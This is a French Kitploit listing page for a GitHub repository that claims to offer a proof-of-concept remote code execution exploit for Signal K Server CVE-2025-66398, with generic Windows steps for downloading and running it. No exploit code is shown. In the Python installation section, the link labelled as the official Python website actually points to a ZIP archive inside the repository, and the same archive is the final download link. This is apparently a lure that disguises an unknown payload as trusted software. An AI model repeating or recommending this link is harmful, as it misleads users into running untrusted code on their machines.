Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-66398 — Démontre l'exploitation de Signal K Server CVE-2025-66398 permettant à des attaquants non authentifiés d'injecter une porte dérobée et d'activer l'exécution de code à distance. | Kitploit
Outils/GitHubGitHub/showy-headteacher114/cve-2025-66398
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Démontre l'exploitation de Signal K Server CVE-2025-66398 permettant à des attaquants non authentifiés d'injecter une porte dérobée et d'activer l'exécution de code à distance.

Voir le dépôt
13il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

⚠️ cve-2025-66398 - Outil simple de preuve de concept RCE

Download


⚙️ À propos de cet outil

Ce projet démontre une vulnérabilité d'exécution de code à distance (RCE) dans Signal K Server versions 2.18.0 et antérieures. La preuve de concept (PoC) montre comment un attaquant pourrait exécuter des commandes sur un appareil vulnérable.

Cet outil est conçu pour les testeurs de sécurité, les administrateurs système ou toute personne intéressée par la compréhension de ce problème de sécurité. Son exécution ne nécessite aucune compétence préalable en programmation, mais des connaissances de base en navigation informatique sont utiles.


🖥️ Configuration système requise

  • Windows 10 ou version ultérieure
  • Au moins 2 Go de RAM libre
  • 100 Mo d'espace disque libre
  • Connexion Internet pour télécharger des fichiers
  • Les droits d'administrateur ne sont PAS nécessaires

📥 Comment télécharger et installer

Cliquez sur le bouton ci-dessous pour visiter la page du projet et télécharger les fichiers.

Download

Étape 1 : Visiter la page de téléchargement

Allez sur le lien ci-dessus. Vous verrez une liste de fichiers et de dossiers sur la page GitHub.

Étape 2 : Télécharger le fichier ZIP

Recherchez le bouton vert Code près du coin supérieur droit de la page. Cliquez dessus et sélectionnez Download ZIP.

Étape 3 : Extraire les fichiers

  • Trouvez le fichier ZIP téléchargé dans votre dossier Téléchargements.
  • Faites un clic droit sur le fichier ZIP et sélectionnez Extraire tout.
  • Choisissez un dossier où vous souhaitez placer les fichiers, puis cliquez sur Extraire.

Étape 4 : Localiser l'application

Ouvrez le dossier extrait. Vous devriez voir des fichiers liés au projet, tels que des scripts et de la documentation.


▶️ Comment exécuter l'outil sur Windows

Le projet utilise des scripts écrits en Python et Go. Pour exécuter l'outil, vous utiliserez une simple fenêtre d'invite de commandes.

Étape 1 : Ouvrir l'invite de commandes

  • Appuyez sur Win + R sur votre clavier.
  • Tapez cmd et appuyez sur Entrée.

Étape 2 : Accéder au dossier

Tapez cette commande, en remplaçant path\to\folder par le chemin de votre dossier extrait :

root@kitploit:~
cd path\to\folder

Appuyez sur Entrée.

Étape 3 : Exécuter le script

Vous trouverez peut-être un script nommé run.bat ou start.bat. Si c'est le cas, tapez son nom et appuyez sur Entrée. Par exemple :

root@kitploit:~
run.bat

S'il n'y a pas de fichier BAT, cherchez un script Python se terminant par .py. Vous devrez avoir Python installé sur votre PC (voir section suivante).

Tapez cette commande pour exécuter :

root@kitploit:~
python scriptname.py

Remplacez scriptname.py par le nom réel du fichier.


🐍 Installation de Python (si nécessaire)

Si vous obtenez une erreur indiquant que Python n'est pas reconnu, vous devez installer Python.

Étape 1 : Télécharger Python

Allez sur le site officiel de Python :

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Cliquez sur le dernier installeur Windows et téléchargez-le.

Étape 2 : Installer Python

  • Exécutez l'installeur téléchargé.
  • Cochez la case Ajouter Python au PATH avant de cliquer sur Installer maintenant.
  • Attendez la fin de l'installation.

Étape 3 : Vérifier l'installation de Python

Ouvrez une nouvelle fenêtre d'invite de commandes et tapez :

root@kitploit:~
python --version

Cela devrait afficher la version de Python installée.


🚨 Exécution sécurisée de l'outil

Cet outil est destiné uniquement aux tests et à l'apprentissage d'une vulnérabilité spécifique. Utilisez-le dans un environnement sûr, comme un réseau de test ou une machine isolée.

Ne l'exécutez jamais contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.


🔍 Comment fonctionne l'outil

L'outil scanne les appareils exécutant Signal K Server version 2.18.0 ou antérieure. Il tente d'envoyer des commandes qui exploitent la vulnérabilité et vérifie si la cible les exécute.

Cela permet aux professionnels de la sécurité de confirmer si leurs systèmes sont vulnérables et de prendre des mesures pour les mettre à jour ou les sécuriser.


💡 Dépannage

  • Si l'outil ne démarre pas, vérifiez que vous êtes dans le bon dossier dans l'invite de commandes.
  • Assurez-vous que Python est installé et ajouté à votre PATH système.
  • Fermez les autres applications qui pourraient bloquer l'accès réseau.
  • Exécutez l'invite de commandes en tant qu'administrateur si vous rencontrez des erreurs de permission.
  • Assurez-vous que l'appareil cible est accessible sur le réseau.

📄 Ressources supplémentaires

Pour plus d'informations sur la vulnérabilité CVE-2025-66398, recherchez sur les bases de données de sécurité ou GitHub des recherches connexes.


🔗 Lien de téléchargement

Visitez cette page pour télécharger les fichiers de l'outil :

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Télécharger l’outil